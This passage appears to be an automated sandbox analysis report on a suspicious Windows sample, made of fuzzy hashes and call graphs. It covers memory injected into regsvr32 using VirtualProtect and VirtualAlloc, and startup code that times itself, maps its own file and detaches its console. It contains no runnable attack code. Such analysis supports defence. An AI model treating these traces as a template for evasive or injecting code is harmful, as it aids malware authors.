                                                                                                                                                                      • Opcode Fuzzy Hash: f07a60ad43d9737788690ae6dadda596156cc3814e82962e9b714f73f23f133c
                                                                                                                                                                      • Instruction Fuzzy Hash: EE619F736186528BC718CE39D85062BB7E3BFC9310F1A8A2DE595DB394DA34F801CB81
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 138 4b3199e-4b31a97 VirtualProtect call 4b3260f call 4b3206d call 4b3260f VirtualProtect 145 4b31c74-4b31c8f 138->145 146 4b31a9d-4b31c71 138->146 148 4b31b03-4b31b8d 145->148 149 4b31c95-4b31cfe call 4b3260f 145->149 146->145 150 4b31b8f-4b31bb7 148->150 151 4b31bbd-4b31c32 148->151 150->149 150->151 151->150 153 4b31c38 151->153
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1981233885.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_4b30000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                      • String ID: `
                                                                                                                                                                      • API String ID: 544645111-2679148245
                                                                                                                                                                      • Opcode ID: 4f2df955c4c2142ed679c2b80ec2d53c4b72f39a6f00f90121dcef2753187969
                                                                                                                                                                      • Instruction ID: 3db97500ec1215555f66f01f1e01a75a371ff8552813244df31d68858d528a4e
                                                                                                                                                                      • Opcode Fuzzy Hash: 4f2df955c4c2142ed679c2b80ec2d53c4b72f39a6f00f90121dcef2753187969
                                                                                                                                                                      • Instruction Fuzzy Hash: 1DA1BBB4E042188FDB28CF99C980B9DFBB1FF48310F1581AAD908AB356D735A985CF51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 309 4b31aa2-4b31afe VirtualProtect 310 4b31b8f-4b31bb7 309->310 311 4b31c95-4b31cfe call 4b3260f 310->311 312 4b31bbd-4b31c32 310->312 312->310 313 4b31c38 312->313
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1981233885.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_4b30000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                      • Opcode ID: ffd9cec59e113ce126e5be9c929a974847e29e8ef9a930cea61375b90080154c
                                                                                                                                                                      • Instruction ID: bdf8d2cff20e3efebc70cf658acf0a980546b5ff710c0c4289b176c63d3e754f
                                                                                                                                                                      • Opcode Fuzzy Hash: ffd9cec59e113ce126e5be9c929a974847e29e8ef9a930cea61375b90080154c
                                                                                                                                                                      • Instruction Fuzzy Hash: 073183B5E012288FDB64CF09CC90B98BBB2FF49304F1581D9C909AB355E775A981CF51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1981233885.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_4b30000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 68a50d5c3ac6f58a3b8ec706c32ce1176a22f03b0707ad385248a146ed972a20
                                                                                                                                                                      • Instruction ID: 690d1581d3d64378b2f192544c9a63588ceb18dc4d50aed0869f8b117417e75d
                                                                                                                                                                      • Opcode Fuzzy Hash: 68a50d5c3ac6f58a3b8ec706c32ce1176a22f03b0707ad385248a146ed972a20
                                                                                                                                                                      • Instruction Fuzzy Hash: E64102B49012058FDB48DFA9C554B9EBBF0FF48308F2485ADD858AB341D37AA946CF91
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:12.2%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:5.6%
                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                      Total number of Limit Nodes:35
                                                                                                                                                                      execution_graph 20924 401044 20927 419c86 20924->20927 20930 419c4b 20927->20930 20931 419c68 20930->20931 20932 419c6f 20930->20932 20936 41c8eb 20931->20936 20939 41c96d 20932->20939 20935 40104e 20937 41c96d __onexit 29 API calls 20936->20937 20938 41c8fd 20937->20938 20938->20935 20942 41c635 20939->20942 20941 41c99e 20941->20935 20943 41c641 BuildCatchObjectHelperInternal 20942->20943 20950 41d8de EnterCriticalSection 20943->20950 20945 41c64f 20951 41c686 20945->20951 20947 41c65c 20961 41c67a 20947->20961 20949 41c66d __onexit 20949->20941 20950->20945 20952 41c6a4 20951->20952 20959 41c69c pre_c_initialization __crt_fast_encode_pointer 20951->20959 20953 41c6fd 20952->20953 20952->20959 20964 41fd25 20952->20964 20955 41fd25 __onexit 29 API calls 20953->20955 20953->20959 20957 41c713 20955->20957 20956 41c6f3 20958 41d99a _free 20 API calls 20956->20958 20960 41d99a _free 20 API calls 20957->20960 20958->20953 20959->20947 20960->20959 20993 41d926 LeaveCriticalSection 20961->20993 20963 41c684 20963->20949 20965 41fd30 20964->20965 20966 41fd58 20965->20966 20968 41fd49 20965->20968 20967 41fd67 20966->20967 20973 421b10 20966->20973 20981 41e0da 20967->20981 20969 41d0a3 __strnicoll 20 API calls 20968->20969 20972 41fd4e ___scrt_fastfail 20969->20972 20972->20956 20974 421b1b 20973->20974 20975 421b26 20974->20975 20976 421b3b HeapSize 20974->20976 20977 41d0a3 __strnicoll 20 API calls 20975->20977 20976->20967 20978 421b2b 20977->20978 20979 41cfe6 __strnicoll 26 API calls 20978->20979 20980 421b36 20979->20980 20980->20967 20982 41e0f2 20981->20982 20983 41e0e7 20981->20983 20985 41e0fa 20982->20985 20991 41e103 pre_c_initialization 20982->20991 20984 41e08c __strnicoll 21 API calls 20983->20984 20989 41e0ef 20984->20989 20986 41d99a _free 20 API calls 20985->20986 20986->20989 20987 41e108 20990 41d0a3 __strnicoll 20 API calls 20987->20990 20988 41e12d HeapReAlloc 20988->20989 20988->20991 20989->20972 20990->20989 20991->20987 20991->20988 20992 41b6ba pre_c_initialization 7 API calls 20991->20992 20992->20991 20993->20963 23354 408769 23355 408782 23354->23355 23356 40877b 23354->23356 23358 40878b GetDlgItem 23355->23358 23364 408780 23355->23364 23365 407dea 23356->23365 23360 4047fa 24 API calls 23358->23360 23362 4087a3 23360->23362 23363 411656 22 API calls 23362->23363 23363->23364 23375 408729 23364->23375 23379 416a40 23365->23379 23367 407e04 SHBrowseForFolderW 23368 407e69 23367->23368 23369 407e24 SHGetPathFromIDListW 23367->23369 23368->23364 23370 407e57 SHGetMalloc 23369->23370 23371 407e3f 23369->23371 23370->23368 23372 4116bd 22 API calls 23371->23372 23373 407e50 23372->23373 23374 4098d4 33 API calls 23373->23374 23374->23370 23376 408735 23375->23376 23377 408759 23375->23377 23376->23377 23378 408746 EndDialog 23376->23378 23378->23377 23380 416a57 23379->23380 23380->23367 23380->23380 20902 41457b 20903 4199d2 22 API calls 20902->20903 20904 414585 20903->20904 22089 41e97e 22090 4200f4 ___scrt_uninitialize_crt 59 API calls 22089->22090 22091 41e986 22090->22091 22099 4212be 22091->22099 22093 41e98b 22109 42135e 22093->22109 22096 41e9b5 22097 41d99a _free 20 API calls 22096->22097 22098 41e9c0 22097->22098 22100 4212ca BuildCatchObjectHelperInternal 22099->22100 22113 41d8de EnterCriticalSection 22100->22113 22102 421340 22127 421355 22102->22127 22104 42134c __onexit 22104->22093 22105 421314 DeleteCriticalSection 22107 41d99a _free 20 API calls 22105->22107 22108 4212d5 22107->22108 22108->22102 22108->22105 22114 42297c 22108->22114 22110 421374 22109->22110 22111 41e99a DeleteCriticalSection 22109->22111 22110->22111 22112 41d99a _free 20 API calls 22110->22112 22111->22093 22111->22096 22112->22111 22113->22108 22115 422988 BuildCatchObjectHelperInternal 22114->22115 22116 422992 22115->22116 22117 4229a7 22115->22117 22118 41d0a3 __strnicoll 20 API calls 22116->22118 22126 4229a2 __onexit 22117->22126 22130 41e9ca EnterCriticalSection 22117->22130 22119 422997 22118->22119 22122 41cfe6 __strnicoll 26 API calls 22119->22122 22121 4229c3 22131 422906 22121->22131 22122->22126 22124 4229ce 22147 4229eb 22124->22147 22126->22108 22211 41d926 LeaveCriticalSection 22127->22211 22129 42135c 22129->22104 22130->22121 22132 422913 22131->22132 22133 422928 22131->22133 22134 41d0a3 __strnicoll 20 API calls 22132->22134 22136 42004a ___scrt_uninitialize_crt 55 API calls 22133->22136 22138 422923 22133->22138 22135 422918 22134->22135 22137 41cfe6 __strnicoll 26 API calls 22135->22137 22139 42293c 22136->22139 22137->22138 22138->22124 22140 42135e 20 API calls 22139->22140 22141 422944 22140->22141 22142 41e890 ___scrt_uninitialize_crt 26 API calls 22141->22142 22143 42294a 22142->22143 22150 4239e6 22143->22150 22146 41d99a _free 20 API calls 22146->22138 22210 41e9de LeaveCriticalSection 22147->22210 22149 4229f3 22149->22126 22151 4239f7 22150->22151 22153 423a0c 22150->22153 22152 41d090 __dosmaperr 20 API calls 22151->22152 22155 4239fc 22152->22155 22154 423a55 22153->22154 22159 423a33 22153->22159 22156 41d090 __dosmaperr 20 API calls 22154->22156 22158 41d0a3 __strnicoll 20 API calls 22155->22158 22157 423a5a 22156->22157 22160 41d0a3 __strnicoll 20 API calls 22157->22160 22163 422950 22158->22163 22165 423964 22159->22165 22162 423a62 22160->22162 22164 41cfe6 __strnicoll 26 API calls 22162->22164 22163->22138 22163->22146 22164->22163 22166 423970 BuildCatchObjectHelperInternal 22165->22166 22176 420240 EnterCriticalSection 22166->22176 22168 42397e 22169 4239b0 22168->22169 22170 4239a5 22168->22170 22172 41d0a3 __strnicoll 20 API calls 22169->22172 22177 423a75 22170->22177 22173 4239ab 22172->22173 22192 4239da 22173->22192 22175 4239cd __onexit 22175->22163 22176->22168 22178 420317 ___scrt_uninitialize_crt 26 API calls 22177->22178 22181 423a85 22178->22181 22179 423a8b 22195 420286 22179->22195 22181->22179 22182 423abd 22181->22182 22185 420317 ___scrt_uninitialize_crt 26 API calls 22181->22185 22182->22179 22183 420317 ___scrt_uninitialize_crt 26 API calls 22182->22183 22186 423ac9 CloseHandle 22183->22186 22188 423ab4 22185->22188 22186->22179 22189 423ad5 GetLastError 22186->22189 22187 423b05 22187->22173 22191 420317 ___scrt_uninitialize_crt 26 API calls 22188->22191 22189->22179 22191->22182 22209 420263 LeaveCriticalSection 22192->22209 22194 4239e4 22194->22175 22196 420295 22195->22196 22197 4202fc 22195->22197 22196->22197 22201 4202bf 22196->22201 22198 41d0a3 __strnicoll 20 API calls 22197->22198 22199 420301 22198->22199 22200 41d090 __dosmaperr 20 API calls 22199->22200 22202 4202ec 22200->22202 22201->22202 22203 4202e6 SetStdHandle 22201->22203 22202->22187 22204 41d06d 22202->22204 22203->22202 22205 41d090 __dosmaperr 20 API calls 22204->22205 22206 41d078 _free 22205->22206 22207 41d0a3 __strnicoll 20 API calls 22206->22207 22208 41d08b 22207->22208 22208->22187 22209->22194 22210->22149 22211->22129 17536 419f24 17537 419f30 BuildCatchObjectHelperInternal 17536->17537 17566 419a94 17537->17566 17539 419f37 17540 41a090 17539->17540 17543 419f61 17539->17543 17616 41a585 IsProcessorFeaturePresent 17540->17616 17542 41a097 17544 41a09d 17542->17544 17597 41c001 17542->17597 17552 419fa0 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 17543->17552 17577 41cbe6 17543->17577 17620 41bfb3 17544->17620 17550 419f80 17555 41a001 17552->17555 17600 41bfc9 17552->17600 17585 41c5cb 17555->17585 17558 41a01e 17605 41a6a7 GetModuleHandleW 17558->17605 17561 41a02c 17562 41a035 17561->17562 17607 41bfa4 17561->17607 17610 419c23 17562->17610 17567 419a9d 17566->17567 17623 41a0b0 IsProcessorFeaturePresent 17567->17623 17571 419aae 17572 419ab2 17571->17572 17634 41caae 17571->17634 17572->17539 17575 419ac9 17575->17539 17580 41cbfd 17577->17580 17578 41a247 _ValidateLocalCookies 5 API calls 17579 419f7a 17578->17579 17579->17550 17581 41cb8a 17579->17581 17580->17578 17584 41cbb9 17581->17584 17582 41a247 _ValidateLocalCookies 5 API calls 17583 41cbe2 17582->17583 17583->17552 17584->17582 17586 41c5d4 17585->17586 17587 41a015 17585->17587 17918 41c31b 17586->17918 17589 40772b GetTickCount 17587->17589 17590 407768 17589->17590 17591 40773b GetTickCount 17589->17591 17590->17558 17591->17590 17592 407748 17591->17592 18240 406563 GetCurrentProcess GetModuleHandleA CreateFileA CreateFileMappingW MapViewOfFile 17592->18240 17594 40774d FreeConsole 18245 4067d5 17594->18245 17596 407764 17596->17558 20624 41be30 17597->20624 17601 41bff1 pre_c_initialization 17600->17601 17602 41baea BuildCatchObjectHelperInternal 17600->17602 17601->17555 17603 41d533 pre_c_initialization 23 API calls 17602->17603 17604 41bafb 17603->17604 17606 41a028 17605->17606 17606->17542 17606->17561 17608 41be30 _CallSETranslator 29 API calls 17607->17608 17609 41bfaf 17608->17609 17609->17562 17611 419c2f 17610->17611 17612 419c45 17611->17612 20711 41cac0 17611->20711 17612->17550 17614 419c3d 17615 424813 ___vcrt_uninitialize 8 API calls 17614->17615 17615->17612 17617 41a59a ___scrt_fastfail 17616->17617 17618 41a645 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17617->17618 17619 41a690 ___scrt_fastfail 17618->17619 17619->17542 17621 41be30 _CallSETranslator 29 API calls 17620->17621 17622 41a0a5 17621->17622 17624 419aa9 17623->17624 17625 4247ea 17624->17625 17626 4247ef ___vcrt_initialize_winapi_thunks 17625->17626 17645 419967 17626->17645 17629 4247fd 17629->17571 17631 424805 17632 424810 17631->17632 17659 4199a3 17631->17659 17632->17571 17700 41fdb8 17634->17700 17637 424813 17638 42481c 17637->17638 17644 42482d 17637->17644 17639 4180e7 ___vcrt_uninitialize_ptd 6 API calls 17638->17639 17640 424821 17639->17640 17641 4199a3 ___vcrt_uninitialize_locks DeleteCriticalSection 17640->17641 17642 424826 17641->17642 17914 41929a 17642->17914 17644->17572 17646 419970 17645->17646 17648 419999 17646->17648 17650 419995 17646->17650 17663 41922a 17646->17663 17649 4199a3 ___vcrt_uninitialize_locks DeleteCriticalSection 17648->17649 17649->17650 17650->17629 17651 4180b4 17650->17651 17681 41913b 17651->17681 17656 4180e4 17656->17631 17658 4180c9 17658->17631 17660 4199cd 17659->17660 17661 4199ae 17659->17661 17660->17629 17662 4199b8 DeleteCriticalSection 17661->17662 17662->17660 17662->17662 17668 4190cc 17663->17668 17665 419244 17666 419262 InitializeCriticalSectionAndSpinCount 17665->17666 17667 41924d 17665->17667 17666->17667 17667->17646 17669 4190f4 17668->17669 17673 4190f0 __crt_fast_encode_pointer 17668->17673 17669->17673 17674 419008 17669->17674 17672 41910e GetProcAddress 17672->17673 17673->17665 17679 419017 try_get_first_available_module 17674->17679 17675 4190c1 17675->17672 17675->17673 17676 419034 LoadLibraryExW 17677 41904f GetLastError 17676->17677 17676->17679 17677->17679 17678 4190aa FreeLibrary 17678->17679 17679->17675 17679->17676 17679->17678 17680 419082 LoadLibraryExW 17679->17680 17680->17679 17682 4190cc try_get_function 5 API calls 17681->17682 17683 419155 17682->17683 17684 41916e TlsAlloc 17683->17684 17685 4180be 17683->17685 17685->17658 17686 4191ec 17685->17686 17687 4190cc try_get_function 5 API calls 17686->17687 17688 419206 17687->17688 17689 419221 TlsSetValue 17688->17689 17690 4180d7 17688->17690 17689->17690 17690->17656 17691 4180e7 17690->17691 17692 4180f1 17691->17692 17693 4180f7 17691->17693 17695 419176 17692->17695 17693->17658 17696 4190cc try_get_function 5 API calls 17695->17696 17697 419190 17696->17697 17698 4191a8 TlsFree 17697->17698 17699 41919c 17697->17699 17698->17699 17699->17693 17701 41fdd5 17700->17701 17704 41fdd1 17700->17704 17701->17704 17707 41eaaa 17701->17707 17712 41eb5e 17701->17712 17703 419abb 17703->17575 17703->17637 17724 41a247 17704->17724 17711 41eab1 17707->17711 17708 41eaf4 GetStdHandle 17708->17711 17709 41eb5a 17709->17701 17710 41eb07 GetFileType 17710->17711 17711->17708 17711->17709 17711->17710 17713 41eb6a BuildCatchObjectHelperInternal 17712->17713 17731 41d8de EnterCriticalSection 17713->17731 17715 41eb71 17732 4201ac 17715->17732 17717 41eb80 17718 41eb8f 17717->17718 17745 41e9f2 GetStartupInfoW 17717->17745 17751 41ebab 17718->17751 17722 41eba0 __onexit 17722->17701 17723 41eaaa 2 API calls 17723->17718 17725 41a250 17724->17725 17726 41a252 IsProcessorFeaturePresent 17724->17726 17725->17703 17728 41a8dc 17726->17728 17913 41a8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17728->17913 17730 41a9bf 17730->17703 17731->17715 17733 4201b8 BuildCatchObjectHelperInternal 17732->17733 17734 4201c1 17733->17734 17735 4201d8 17733->17735 17762 41d0a3 17734->17762 17754 41d8de EnterCriticalSection 17735->17754 17740 4201d0 __onexit 17740->17717 17741 420210 17768 420237 17741->17768 17743 4201e4 17743->17741 17755 4200fd 17743->17755 17746 41eaa3 17745->17746 17747 41ea0f 17745->17747 17746->17723 17747->17746 17748 4201ac 27 API calls 17747->17748 17749 41ea37 17748->17749 17749->17746 17750 41ea67 GetFileType 17749->17750 17750->17749 17912 41d926 LeaveCriticalSection 17751->17912 17753 41ebb2 17753->17722 17754->17743 17771 41d93d 17755->17771 17757 42010f 17761 42011c 17757->17761 17778 41dde9 17757->17778 17760 42016e 17760->17743 17785 41d99a 17761->17785 17819 41d681 GetLastError 17762->17819 17765 41cfe6 17890 41cf6b 17765->17890 17767 41cff2 17767->17740 17911 41d926 LeaveCriticalSection 17768->17911 17770 42023e 17770->17740 17777 41d94a pre_c_initialization 17771->17777 17772 41d98a 17774 41d0a3 __strnicoll 19 API calls 17772->17774 17773 41d975 RtlAllocateHeap 17775 41d988 17773->17775 17773->17777 17774->17775 17775->17757 17777->17772 17777->17773 17791 41b6ba 17777->17791 17806 41daea 17778->17806 17780 41de10 17781 41de2e InitializeCriticalSectionAndSpinCount 17780->17781 17784 41de19 17780->17784 17781->17784 17782 41a247 _ValidateLocalCookies 5 API calls 17783 41de45 17782->17783 17783->17757 17784->17782 17786 41d9ce _free 17785->17786 17787 41d9a5 HeapFree 17785->17787 17786->17760 17787->17786 17788 41d9ba 17787->17788 17789 41d0a3 __strnicoll 18 API calls 17788->17789 17790 41d9c0 GetLastError 17789->17790 17790->17786 17796 41b6fe 17791->17796 17793 41a247 _ValidateLocalCookies 5 API calls 17794 41b6fa 17793->17794 17794->17777 17795 41b6d0 17795->17793 17797 41b70a BuildCatchObjectHelperInternal 17796->17797 17802 41d8de EnterCriticalSection 17797->17802 17799 41b715 17803 41b747 17799->17803 17801 41b73c __onexit 17801->17795 17802->17799 17804 41d926 _CallSETranslator LeaveCriticalSection 17803->17804 17805 41b74e 17804->17805 17805->17801 17807 41db17 17806->17807 17811 41db13 __crt_fast_encode_pointer 17806->17811 17807->17811 17812 41da22 17807->17812 17810 41db31 GetProcAddress 17810->17811 17811->17780 17814 41da33 try_get_first_available_module 17812->17814 17813 41da50 LoadLibraryExW 17813->17814 17815 41da6b GetLastError 17813->17815 17814->17813 17816 41dac6 FreeLibrary 17814->17816 17817 41dadd 17814->17817 17818 41da9e LoadLibraryExW 17814->17818 17815->17814 17816->17814 17817->17810 17817->17811 17818->17814 17820 41d69a 17819->17820 17821 41d6a0 17819->17821 17845 41dd3a 17820->17845 17844 41d6a6 17821->17844 17852 41dd90 17821->17852 17825 41d6ab SetLastError 17827 41d0a8 17825->17827 17826 41d93d pre_c_initialization 17 API calls 17828 41d6d7 17826->17828 17827->17765 17830 41d6f4 17828->17830 17831 41d6df 17828->17831 17829 41d72b SetLastError 17829->17827 17833 41dd90 pre_c_initialization 11 API calls 17830->17833 17832 41dd90 pre_c_initialization 11 API calls 17831->17832 17834 41d6eb 17832->17834 17835 41d700 17833->17835 17840 41d99a _free 17 API calls 17834->17840 17836 41d713 17835->17836 17837 41d704 17835->17837 17859 41d35d 17836->17859 17838 41dd90 pre_c_initialization 11 API calls 17837->17838 17838->17834 17842 41d6f1 17840->17842 17842->17825 17843 41d99a _free 17 API calls 17843->17844 17844->17825 17844->17829 17846 41daea pre_c_initialization 5 API calls 17845->17846 17847 41dd61 17846->17847 17848 41dd79 TlsGetValue 17847->17848 17849 41dd6d 17847->17849 17848->17849 17850 41a247 _ValidateLocalCookies 5 API calls 17849->17850 17851 41dd8a 17850->17851 17851->17821 17853 41daea pre_c_initialization 5 API calls 17852->17853 17854 41ddb7 17853->17854 17855 41ddd2 TlsSetValue 17854->17855 17856 41ddc6 17854->17856 17855->17856 17857 41a247 _ValidateLocalCookies 5 API calls 17856->17857 17858 41d6c7 17857->17858 17858->17825 17858->17826 17864 41d219 17859->17864 17861 41d3cb 17870 41d30d 17861->17870 17863 41d3f4 17863->17843 17865 41d225 BuildCatchObjectHelperInternal 17864->17865 17878 41d8de EnterCriticalSection 17865->17878 17867 41d22f 17879 41d255 17867->17879 17869 41d24d __onexit 17869->17861 17871 41d319 BuildCatchObjectHelperInternal 17870->17871 17882 41d8de EnterCriticalSection 17871->17882 17873 41d323 17883 41d4e8 17873->17883 17875 41d33b 17887 41d351 17875->17887 17877 41d349 __onexit 17877->17863 17878->17867 17880 41d926 _CallSETranslator LeaveCriticalSection 17879->17880 17881 41d25f 17880->17881 17881->17869 17882->17873 17884 41d4f7 pre_c_initialization 17883->17884 17886 41d51e pre_c_initialization 17883->17886 17885 4207a5 pre_c_initialization 20 API calls 17884->17885 17884->17886 17885->17886 17886->17875 17888 41d926 _CallSETranslator LeaveCriticalSection 17887->17888 17889 41d35b 17888->17889 17889->17877 17891 41d681 __dosmaperr 20 API calls 17890->17891 17892 41cf81 17891->17892 17893 41cfe0 17892->17893 17894 41cf8f 17892->17894 17901 41cff6 IsProcessorFeaturePresent 17893->17901 17899 41a247 _ValidateLocalCookies 5 API calls 17894->17899 17896 41cfe5 17897 41cf6b __strnicoll 26 API calls 17896->17897 17898 41cff2 17897->17898 17898->17767 17900 41cfb6 17899->17900 17900->17767 17902 41d002 17901->17902 17905 41ce21 17902->17905 17906 41ce3d ___scrt_fastfail 17905->17906 17907 41ce69 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17906->17907 17910 41cf3a ___scrt_fastfail 17907->17910 17908 41a247 _ValidateLocalCookies 5 API calls 17909 41cf58 GetCurrentProcess TerminateProcess 17908->17909 17909->17896 17910->17908 17911->17770 17912->17753 17913->17730 17915 4192c9 17914->17915 17917 4192a3 17914->17917 17915->17644 17916 4192b3 FreeLibrary 17916->17917 17917->17915 17917->17916 17919 41c324 17918->17919 17922 41c32c 17918->17922 17919->17922 17924 41c347 17919->17924 17921 41c334 17921->17922 17937 41c49a 17921->17937 17922->17587 17925 41c350 17924->17925 17926 41c353 17924->17926 17925->17921 17947 41f5bb 17926->17947 17931 41c365 17934 41d99a _free 20 API calls 17931->17934 17935 41c394 17934->17935 17935->17921 17936 41d99a _free 20 API calls 17936->17931 17938 41c4a7 17937->17938 17946 41c4ac 17937->17946 17938->17922 17939 41c4b2 WideCharToMultiByte 17940 41c507 17939->17940 17939->17946 17940->17922 17941 41d93d pre_c_initialization 20 API calls 17941->17946 17942 41c4d8 WideCharToMultiByte 17943 41c50d 17942->17943 17942->17946 17944 41d99a _free 20 API calls 17943->17944 17944->17940 17945 41d99a _free 20 API calls 17945->17946 17946->17939 17946->17940 17946->17941 17946->17942 17946->17943 17946->17945 17948 41c35a 17947->17948 17949 41f5c4 17947->17949 17953 41f939 GetEnvironmentStringsW 17948->17953 17982 41d5e7 17949->17982 17951 41f5e7 18004 41f40d 17951->18004 17954 41f950 17953->17954 17964 41f9a3 17953->17964 17957 41f956 WideCharToMultiByte 17954->17957 17955 41c35f 17955->17931 17965 41c39a 17955->17965 17956 41f9ac FreeEnvironmentStringsW 17956->17955 17958 41f972 17957->17958 17957->17964 17959 41e08c __strnicoll 21 API calls 17958->17959 17960 41f978 17959->17960 17961 41f995 17960->17961 17962 41f97f WideCharToMultiByte 17960->17962 17963 41d99a _free 20 API calls 17961->17963 17962->17961 17963->17964 17964->17955 17964->17956 17966 41c3af 17965->17966 17967 41d93d pre_c_initialization 20 API calls 17966->17967 17977 41c3d6 17967->17977 17968 41c43a 17969 41d99a _free 20 API calls 17968->17969 17970 41c370 17969->17970 17970->17936 17971 41d93d pre_c_initialization 20 API calls 17971->17977 17972 41c43c 18234 41c46b 17972->18234 17976 41d99a _free 20 API calls 17976->17968 17977->17968 17977->17971 17977->17972 17978 41c45e 17977->17978 17980 41d99a _free 20 API calls 17977->17980 18225 41bb31 17977->18225 17979 41cff6 __strnicoll 11 API calls 17978->17979 17981 41c46a 17979->17981 17980->17977 17983 41d5f2 17982->17983 17984 41d5f8 17982->17984 17986 41dd3a pre_c_initialization 11 API calls 17983->17986 17985 41dd90 pre_c_initialization 11 API calls 17984->17985 17988 41d5fe 17984->17988 17987 41d612 17985->17987 17986->17984 17987->17988 17989 41d93d pre_c_initialization 20 API calls 17987->17989 17988->17951 17990 41d622 17989->17990 17991 41d62a 17990->17991 17992 41d63f 17990->17992 17993 41dd90 pre_c_initialization 11 API calls 17991->17993 17994 41dd90 pre_c_initialization 11 API calls 17992->17994 17995 41d636 17993->17995 17996 41d64b 17994->17996 18001 41d99a _free 20 API calls 17995->18001 17997 41d64f 17996->17997 17998 41d65e 17996->17998 17999 41dd90 pre_c_initialization 11 API calls 17997->17999 18000 41d35d pre_c_initialization 20 API calls 17998->18000 17999->17995 18002 41d669 18000->18002 18001->17988 18003 41d99a _free 20 API calls 18002->18003 18003->17988 18022 41f528 18004->18022 18006 41f420 18028 41f1a1 18006->18028 18009 41f439 18009->17948 18012 41f47c 18014 41d99a _free 20 API calls 18012->18014 18014->18009 18016 41f477 18017 41d0a3 __strnicoll 20 API calls 18016->18017 18017->18012 18018 41f4c0 18018->18012 18053 41f09d 18018->18053 18019 41f494 18019->18018 18020 41d99a _free 20 API calls 18019->18020 18020->18018 18026 41f534 BuildCatchObjectHelperInternal 18022->18026 18025 41f5b3 __onexit 18025->18006 18026->18025 18027 41d99a _free 20 API calls 18026->18027 18061 41d8de EnterCriticalSection 18026->18061 18062 41f5aa 18026->18062 18027->18026 18066 41b0d9 18028->18066 18031 41f1c2 GetOEMCP 18033 41f1eb 18031->18033 18032 41f1d4 18032->18033 18034 41f1d9 GetACP 18032->18034 18033->18009 18035 41e08c 18033->18035 18034->18033 18036 41e0ca 18035->18036 18040 41e09a pre_c_initialization 18035->18040 18038 41d0a3 __strnicoll 20 API calls 18036->18038 18037 41e0b5 RtlAllocateHeap 18039 41e0c8 18037->18039 18037->18040 18038->18039 18039->18012 18042 41f616 18039->18042 18040->18036 18040->18037 18041 41b6ba pre_c_initialization 7 API calls 18040->18041 18041->18040 18043 41f1a1 25 API calls 18042->18043 18046 41f635 18043->18046 18044 41f63f 18045 41a247 _ValidateLocalCookies 5 API calls 18044->18045 18047 41f46f 18045->18047 18046->18044 18048 41f693 IsValidCodePage 18046->18048 18049 41f685 GetACP 18046->18049 18052 41f6b8 ___scrt_fastfail 18046->18052 18047->18016 18047->18019 18048->18044 18050 41f6a5 GetCPInfo 18048->18050 18049->18044 18049->18048 18050->18044 18050->18052 18131 41f279 GetCPInfo 18052->18131 18054 41f0a9 BuildCatchObjectHelperInternal 18053->18054 18199 41d8de EnterCriticalSection 18054->18199 18056 41f0b3 18200 41f0e0 18056->18200 18060 41f0cc __onexit 18060->18012 18061->18026 18065 41d926 LeaveCriticalSection 18062->18065 18064 41f5b1 18064->18026 18065->18064 18067 41b0f6 18066->18067 18073 41b0ec 18066->18073 18067->18073 18074 41d533 GetLastError 18067->18074 18069 41b117 18100 41d77a 18069->18100 18073->18031 18073->18032 18075 41d549 18074->18075 18079 41d54f 18074->18079 18077 41dd3a pre_c_initialization 11 API calls 18075->18077 18076 41dd90 pre_c_initialization 11 API calls 18078 41d569 18076->18078 18077->18079 18080 41d5da SetLastError 18078->18080 18081 41d93d pre_c_initialization 20 API calls 18078->18081 18079->18076 18099 41d555 18079->18099 18082 41d5e6 18080->18082 18084 41d579 18081->18084 18083 41d55a 18083->18080 18086 41d581 18084->18086 18087 41d596 18084->18087 18085 41d5ce SetLastError 18085->18069 18088 41dd90 pre_c_initialization 11 API calls 18086->18088 18089 41dd90 pre_c_initialization 11 API calls 18087->18089 18090 41d58d 18088->18090 18091 41d5a2 18089->18091 18096 41d99a _free 20 API calls 18090->18096 18092 41d5b5 18091->18092 18093 41d5a6 18091->18093 18095 41d35d pre_c_initialization 20 API calls 18092->18095 18094 41dd90 pre_c_initialization 